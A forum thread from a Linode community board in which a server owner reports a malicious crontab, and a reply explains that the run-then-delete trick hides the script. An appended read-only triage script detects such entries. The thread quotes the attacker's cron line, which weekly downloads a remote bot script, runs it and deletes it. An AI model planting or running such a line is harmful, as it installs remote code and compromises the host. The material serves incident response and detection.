Linode Forum
Linode Community Forums
PostPosted: Mon Jan 04, 2016 9:51 am 
Senior Newbie

Joined: Thu Dec 17, 2009 7:12 pm
Posts: 5
Regards,

Since my server acted "weird" lately (pulling high bandwidth in spikes during my nighttimes, then automatically stopping for the past few days), I inspected the server and found a crontab which pulled regular.bot from stablehost.us:

Code:
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1


A quick Google search led me to the following CentOS (I'm running Debian) forum page:

https://www.centos.org/forums/viewtopic ... 17&t=48804

Looking through my device in /tmp, there are no scripts which shouldn't belong as far as I can see:

Code:
root@ragnarok:/tmp# ls -alh
total 24K
drwxrwxrwt  6 root root    4.0K Jan  4 13:45 .
drwxr-xr-x 24 root root    4.0K Jan  4 05:14 ..
drwxrwxrwt  2 root root    4.0K Dec 23 23:39 .ICE-unix
drwxrwxrwt  2 root root    4.0K Dec 23 23:39 .X11-unix
-rw-r--r--  1 root root       0 Jan  4 13:16 .sh
drwxr-xr-x  2 root root    4.0K Dec 23 23:39 .webmin


Anyone able to provide more info with a means to make sure the system is clean?
I know the best course of action would be to scrap the server and start over. This is scheduled, but I currently don't have the time for it yet, so if I could make sure it's not a threat at this minute, I could build the new machine at the scheduled time.


Regards,


PostPosted: Tue Jan 05, 2016 6:43 am 
Senior Member
Joined: Sun Jan 18, 2009 2:41 pm
Posts: 830
The crontab runs the script and then deletes it, which is why you don't see a file in /tmp. While the script is running, Linux keeps the file in memory even though it doesn't have a name any longer.

I haven't looked at this particular script to see if it uses any other tricks to hide itself, but you need to consider the entire system as being compromised - what are the chances that only one malicious actor found an exploit?


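As an added example (not from either poster), a read-only triage script for the two points raised in this thread: flagging crontab entries that download a file and hand it straight to a shell, and finding processes that still hold a deleted script open, which is where the "vanished" /tmp/sh lives while it runs. It assumes a Linux system with /proc; the crontab paths are the usual Debian and CentOS defaults and can be adjusted.

```shell
#!/bin/sh
# Triage for the pattern in this thread: a cron job that downloads a script,
# runs it, then rm's it so nothing is left in /tmp while it keeps running.
# Everything here only reads files; nothing is modified.

# Check 1: crontab lines that fetch with wget/curl and pass the result to a shell
# (either piped into sh, or saved and then run with ";sh FILE" / "&& sh FILE").
# Usage: flag_fetch_and_exec FILE   (prints matching lines with line numbers;
# exit status 0 when at least one line matched, 1 otherwise, like grep)
flag_fetch_and_exec() {
    grep -nE '(wget|curl).*(\||;|&&)[[:space:]]*(/bin/)?(ba|da)?sh([[:space:]]|$)' "$1"
}

# Check 2: processes that still hold a deleted file open. A deleted /tmp/sh is
# still readable through /proc/PID/fd/N as long as the shell running it lives.
# Usage: list_deleted_open_files [PROC_ROOT]   (PROC_ROOT defaults to /proc;
# a constructed directory tree can be passed instead for offline testing)
# Output: one "PID FD TARGET" line per deleted-but-open file.
list_deleted_open_files() {
    proc_root=${1:-/proc}
    for fd in "$proc_root"/[0-9]*/fd/*; do
        [ -L "$fd" ] || continue                 # unreadable dirs or no match: skip
        target=$(readlink "$fd" 2>/dev/null) || continue
        case $target in
            *' (deleted)')
                pid=${fd#"$proc_root"/}          # strip the proc root ...
                pid=${pid%%/*}                   # ... leaving just the PID
                printf '%s %s %s\n' "$pid" "${fd##*/}" "$target"
                ;;
        esac
    done
}

# Stand-alone run: scan the live system (run as root to see every process).
echo "== crontab lines that download and execute =="
for f in /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/*; do
    [ -f "$f" ] && [ -r "$f" ] && flag_fetch_and_exec "$f" | sed "s|^|$f:|"
done
echo "== processes holding deleted files open (PID FD TARGET) =="
list_deleted_open_files /proc
```

A deleted-but-open script can be copied out for analysis with `cat /proc/PID/fd/N` before the process is killed.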